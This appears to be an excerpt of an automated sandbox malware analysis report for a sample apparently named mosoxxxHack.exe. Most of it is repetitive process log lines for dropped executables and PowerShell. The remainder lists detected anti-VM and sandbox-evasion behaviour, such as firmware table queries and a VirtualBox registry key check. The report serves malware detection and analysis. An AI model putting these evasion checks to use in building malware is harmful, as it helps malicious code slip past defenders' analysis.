Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000011.00000002.406356590.0000000002B06000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.465696489.00000000032A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: drbux.exe PID: 1380, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Show sources

Source: C:\Users\user\Desktop\mosoxxxHack.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Show sources

Source: C:\Users\user\Desktop\mosoxxxHack.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

